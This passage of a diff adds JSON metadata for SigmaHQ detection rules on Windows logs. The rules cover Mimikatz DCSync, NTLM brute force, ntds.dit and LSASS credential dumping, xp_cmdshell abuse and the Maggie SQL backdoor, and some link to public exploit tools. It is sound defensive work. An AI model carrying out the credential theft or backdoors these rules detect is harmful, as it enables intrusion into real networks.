"d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "value": "CobaltStrike Service Installations - Security" + }, + { + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", + "level": "high", + "logsource.category": 
"No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" + ], + "tags": "No established tags" + }, + "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "value": "Suspicious Computer Account Name Change CVE-2021-42287" + }, + { + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/03", + "falsepositive": [ + "Legitimate extension of domain structure" + ], + "filename": "win_security_susp_add_domain_trust.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", + "value": "Addition of Domain Trusts" + }, + { + "description": "Detects Mimikatz DC sync security events", + "meta": { + "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", + "creation_date": "2018/06/03", + "falsepositive": [ + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" + ], + "filename": "win_security_dcsync.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" + ] + }, + "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "value": "Mimikatz DC Sync" + }, + { + "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", + "value": "Disabled Users Failing To Authenticate From Source Using Kerberos" + }, + { + "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", + "value": "Valid Users Failing to Authenticate from Single Source Using NTLM" + }, + { + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/19", + "falsepositive": [ + "User using a disabled account" + ], + "filename": "win_security_susp_failed_logon_reasons.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1101431884540710913", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "value": "Account Tampering - Suspicious Failed Logon Reasons" + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_service_installation_by_unusal_client.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1490608838701166596", 
+ "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "value": "Service Installed By Unusual Client - Security" + }, + { + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_active_directory_user_control.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "value": "Enabled User Right in AD to Control User Objects" + }, + { + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "meta": { + "author": "elhoim", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_computer_name.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", + "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", + "https://twitter.com/malmoeb/status/1511760068743766026", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" + ], + "tags": [ + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "value": "Win Susp Computer Name Containing Samtheadmin" + }, + { + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_update.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "value": "Suspicious Scheduled Task Update" + }, + { + "description": "Detect remote login by Administrator user (depending on internal pattern).", + "meta": { + "author": "juju4", + "creation_date": "2017/10/29", + "falsepositive": [ + "Legitimate administrative activity." 
+ ], + "filename": "win_security_admin_rdp_login.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2016-04-005", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" + ] + }, + "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "value": "Admin User Remote Logon" + }, + { + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "meta": { + "author": "INIT_6", + "creation_date": "2021/07/02", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/INIT_3/status/1410662463641731075", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", + "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access" + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dcom_iertutil_dll_hijack.yml", + "level": "high", + "logsource.category": "No established 
category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021.002",
+ "attack.t1021.003"
+ ]
+ },
+ "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641",
+ "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security"
+ },
+ {
+ "description": "Detects common NTLM brute force device names",
+ "meta": {
+ "author": "Jerry Shockley '@jsh0x'",
+ "creation_date": "2022/02/02",
+ "falsepositive": [
+ "Systems with names equal to the spoofed ones used by the brute force tools"
+ ],
+ "filename": "win_susp_ntlm_brute_force.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.varonis.com/blog/investigate-ntlm-brute-force",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1110"
+ ]
+ },
+ "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59",
+ "value": "NTLM Brute Force"
+ },
+ {
+ "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2018/06/08",
+ "falsepositive": [
+ "Legacy hosts"
+ ],
+ "filename": "win_susp_ntlm_auth.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/JohnLaTwC/status/1004895028995477505",
+ "https://goo.gl/PsqrhT",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1550.002"
+ ]
+ },
+ "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b",
+ "value": "NTLM Logon"
+ },
+ {
+ "description": 
"Detects logons using NTLM to hosts that are potentially not part of the domain.",
+ "meta": {
+ "author": "James Pemberton",
+ "creation_date": "2020/05/22",
+ "falsepositive": [
+ "Host connections to valid domains, exclude these.",
+ "Host connections not using host FQDN.",
+ "Host connections to external legitimate domains."
+ ],
+ "filename": "win_susp_ntlm_rdp.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "n/a",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ]
+ },
+ "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad",
+ "value": "Potential Remote Desktop Connection to Non-Domain Host"
+ },
+ {
+ "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688",
+ "meta": {
+ "author": "Florian Roth, wagga",
+ "creation_date": "2020/02/29",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_vul_cve_2020_0688.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/",
+ "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1190"
+ ]
+ },
+ "uuid": "d6266bf5-935e-4661-b477-78772735a7cb",
+ "value": "CVE-2020-0688 Exploitation via Eventlog"
+ },
+ {
+ "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators",
+ "meta": {
+ "author": "Bhabesh Raj",
+ "creation_date": "2021/09/01",
+ "falsepositive": [
+ "Legitimate Atera agent 
installation"
+ ],
+ "filename": "win_software_atera_rmm_agent_install.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml"
+ ],
+ "tags": [
+ "attack.t1219"
+ ]
+ },
+ "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43",
+ "value": "Atera Agent Installation"
+ },
+ {
+ "description": "Detects backup catalog deletions",
+ "meta": {
+ "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)",
+ "creation_date": "2017/05/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_susp_backup_delete.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
+ "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070.004"
+ ]
+ },
+ "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a",
+ "value": "Backup Catalog Deleted"
+ },
+ {
+ "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/11/22",
+ "falsepositive": [
+ "Other MSI packages for which your admins have used that name"
+ ],
+ "filename": "win_vul_cve_2021_41379.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/klinix5/InstallerFileTakeOver",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml"
+ ],
+ "tags": [ 
+ "attack.initial_access",
+ "attack.t1190"
+ ]
+ },
+ "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8",
+ "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379"
+ },
+ {
+ "description": "Detects MSI package installation from suspicious locations",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/31",
+ "falsepositive": [
+ "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares"
+ ],
+ "filename": "win_msi_install_from_susp_locations.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_susp_locations.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341",
+ "value": "MSI Installation From Suspicious Locations"
+ },
+ {
+ "description": "Detects installation of a remote msi file from web.",
+ "meta": {
+ "author": "Stamatis Chatzimangou",
+ "creation_date": "2022/10/23",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_msi_install_from_web.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/_st0pp3r_/status/1583922009842802689",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_msi_install_from_web.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1218",
+ "attack.t1218.007"
+ ]
+ },
+ "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60",
+ "value": "MSI Installation From Web"
+ },
+ {
+ "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/14",
+ 
"falsepositive": [
+ "Legitimate backup operation/creating shadow copies"
+ ],
+ "filename": "win_esent_ntdsutil_abuse_susp_location.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
+ "https://twitter.com/mgreen27/status/1558223256704122882",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse_susp_location.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "94dc4390-6b7c-4784-8ffc-335334404650",
+ "value": "Dump Ntds.dit To Suspicious Location"
+ },
+ {
+ "description": "This detection method points out highly relevant Antivirus events",
+ "meta": {
+ "author": "Florian Roth, Arnim Rupp",
+ "creation_date": "2017/02/19",
+ "falsepositive": [
+ "Some software piracy tools (key generators, cracks) are classified as hack tools"
+ ],
+ "filename": "win_av_relevant_match.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31",
+ "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
+ "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1588"
+ ]
+ },
+ "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8",
+ "value": "Relevant Anti-Virus Event"
+ },
+ {
+ "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/13",
+ "falsepositive": [
+ "Legitimate use of the feature by administrators (rare)"
+ ],
+ "filename": "win_mssql_sp_procoption_set.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16",
+ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml"
+ ],
+ "tags": [
+ "attack.persistence"
+ ]
+ },
+ "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964",
+ "value": "MSSQL SPProcoption Set"
+ },
+ {
+ "description": "Detects potential abuse of ntdsutil to dump ntds.dit database",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/14",
+ "falsepositive": [
+ "Legitimate backup operation/creating shadow copies"
+ ],
+ "filename": "win_esent_ntdsutil_abuse.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
+ "https://twitter.com/mgreen27/status/1558223256704122882",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_esent_ntdsutil_abuse.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f",
+ "value": "Ntdsutil Abuse"
+ },
+ {
+ "description": "An application has been removed. 
Check if it is critical.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_builtin_remove_application.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_builtin_remove_application.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1489"
+ ]
+ },
+ "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e",
+ "value": "Application Uninstalled"
+ },
+ {
+ "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2017/05/09",
+ "falsepositive": [
+ "MsMpEng.exe can crash when C:\\ is full"
+ ],
+ "filename": "win_susp_msmpeng_crash.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
+ "https://technet.microsoft.com/en-us/library/security/4022344",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1211",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "6c82cf5c-090d-4d57-9188-533577631108",
+ "value": "Microsoft Malware Protection Engine Crash"
+ },
+ {
+ "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/12",
+ "falsepositive": [
+ "Legitimate enable/disable of the setting",
+ "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable"
+ ],
+ "filename": "win_mssql_xp_cmdshell_change.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "d08dd86f-681e-4a00-a92c-1db218754417",
+ "value": "MSSQL XPCmdshell Option Change"
+ },
+ {
+ "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/12/07",
+ "falsepositive": [
+ "Rare legitimate crashing of the lsass process"
+ ],
+ "filename": "win_werfault_susp_lsass_credential_dump.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55",
+ "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
+ "https://github.com/deepinstinct/Lsass-Shtinkering",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ]
+ },
+ "uuid": "a18e0862-127b-43ca-be12-1a542c75c7c5",
+ "value": "Potential Credential Dumping Via WER - Application"
+ },
+ {
+ "description": "Detects events generated by user-mode applications when they call 
the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n",
+ "meta": {
+ "author": "Florian Roth, Zach Mathis",
+ "creation_date": "2020/01/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_audit_cve.yml",
+ "level": "critical",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/DidierStevens/status/1217533958096924676",
+ "https://nullsec.us/windows-event-log-audit-cve/",
+ "https://twitter.com/VM_vivisector/status/1217190929330655232",
+ "https://www.youtube.com/watch?v=ebmW42YYveI",
+ "https://twitter.com/FlemmingRiis/status/1217147415482060800",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1203",
+ "attack.privilege_escalation",
+ "attack.t1068",
+ "attack.defense_evasion",
+ "attack.t1211",
+ "attack.credential_access",
+ "attack.t1212",
+ "attack.lateral_movement",
+ "attack.t1210",
+ "attack.impact",
+ "attack.t1499.004"
+ ]
+ },
+ "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2",
+ "value": "Audit CVE Event"
+ },
+ {
+ "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server",
+ "meta": {
+ "author": "Denis Szadkowski, DIRT / DCSO CyTec",
+ "creation_date": "2022/10/09",
+ "falsepositive": [
+ "Legitimate extended stored procedures named maggie"
+ ],
+ "filename": "win_mssql_sp_maggie.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml"
+ ],
+ "tags": [
+ 
"attack.persistence",
+ "attack.t1546"
+ ]
+ },
+ "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8",
+ "value": "MSSQL Extended Stored Procedure Backdoor Maggie"
+ },
+ {
+ "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_mssql_xp_cmdshell_audit_log.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "7f103213-a04e-4d59-8261-213dddf22314",
+ "value": "MSSQL XPCmdshell Suspicious Execution"
+ },
+ {
+ "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/13",
+ "falsepositive": [
+ "Rare legitimate administrative activity"
+ ],
+ "filename": "win_mssql_add_sysadmin_account.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml"
+ ],
+ "tags": [
+ "attack.persistence"
+ ]
+ },
+ "uuid": "08200f85-2678-463e-9c32-88dce2f073d1",
+ "value": "MSSQL Add Account To Sysadmin Role"
+ },
+ {
+ "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER 
AUDIT\" transaction in order to delete or disable audit logs on the server",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/13",
+ "falsepositive": [
